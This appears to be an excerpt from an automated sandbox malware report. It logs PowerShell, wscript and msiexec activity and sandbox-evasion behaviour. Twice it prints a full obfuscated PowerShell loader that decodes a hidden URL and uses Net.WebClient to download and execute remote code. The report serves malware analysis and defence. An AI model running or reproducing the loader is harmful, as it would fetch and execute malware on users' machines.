              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraadde
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;HalvraaddeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7BFE400BD pushad ; iretd 8_2_00007FF7BFE400C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7BFE4A711 push eax; iretd 8_2_00007FF7BFE4A731
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7BFE40942 push E95B7BD0h; ret 8_2_00007FF7BFE409C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF7BFF11229 push eax; retf 8_2_00007FF7BFF11249
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0708C020 pushfd ; ret 10_2_0708C3A5
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select *from Win32_Service
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4203Jump to behavior
